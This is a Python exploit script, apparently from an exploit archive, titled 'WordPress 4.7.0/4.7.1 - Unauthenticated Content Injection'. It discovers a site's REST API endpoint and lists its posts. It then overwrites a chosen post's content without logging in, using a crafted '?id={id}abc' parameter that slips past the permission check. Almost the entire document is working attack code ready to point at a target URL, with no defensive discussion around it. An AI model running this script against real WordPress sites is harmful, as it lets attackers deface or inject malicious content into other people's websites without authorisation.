WordPress 4.7.0/4.7.1 - Unauthenticated Content Injection (P

1. import json
2. import sys
3. import urllib2
4.  
5. from lxml import etree
6.  
7.  
8. def get_api_url(wordpress_url):
9.     response = urllib2.urlopen(wordpress_url)
10.  
11.     data = etree.HTML(response.read())
12.     u = data.xpath('//link[@rel="https://api.w.org/"]/@href')[0]
13.  
14.     # check if we have permalinks
15.     if 'rest_route' in u:
16.         print(' ! Warning, looks like permalinks are not enabled. This might not work!')
17.  
18.     return u
19.  
20.  
21. def get_posts(api_base):
22.     respone = urllib2.urlopen(api_base + 'wp/v2/posts')
23.     posts = json.loads(respone.read())
24.  
25.     for post in posts:
26.         print(' - Post ID: {}, Title: {}, Url: {}'
27.               .format(post['id'], post['title']['rendered'], post['link']))
28.  
29.  
30. def update_post(api_base, post_id, post_content):
31.     # more than just the content field can be updated. see the api docs here:
32.     # https://developer.wordpress.org/rest-api/reference/posts/#update-a-post
33.     data = json.dumps({
34.         'content': post_content
35.     })
36.  
37.     url = api_base + 'wp/v2/posts/{post_id}/?id={post_id}abc'.format(post_id=post_id)
38.     req = urllib2.Request(url, data, {'Content-Type': 'application/json'})
39.     response = urllib2.urlopen(req).read()
40.  
41.     print('* Post updated. Check it out at {}'.format(json.loads(response)['link']))
42.  
43.  
44. def print_usage():
45.     print('Usage: {} <url> (optional: <post_id> <file with post_content>)'.format(__file__))
46.  
47.  
48. if __name__ == '__main__':
49.  
50.     # ensure we have at least a url
51.     if len(sys.argv) < 2:
52.         print_usage()
53.         sys.exit(1)
54.  
55.     # if we have a post id, we need content too
56.     if 2 < len(sys.argv) < 4:
57.         print('Please provide a file with post content with a post id')
58.         print_usage()
59.         sys.exit(1)
60.  
61.     print('* Discovering API Endpoint')
62.     api_url = get_api_url(sys.argv[1])
63.     print('* API lives at: {}'.format(api_url))
64.  
65.     # if we only have a url, show the posts we have have
66.     if len(sys.argv) < 3:
67.         print('* Getting available posts')
68.         get_posts(api_url)
69.  
70.         sys.exit(0)
71.  
72.     # if we get here, we have what we need to update a post!
73.     print('* Updating post {}'.format(sys.argv[2]))
74.     with open(sys.argv[3], 'r') as content:
75.         new_content = content.readlines()
76.  
77.     update_post(api_url, sys.argv[2], ''.join(new_content))
78.  
79.     print('* Update complete!')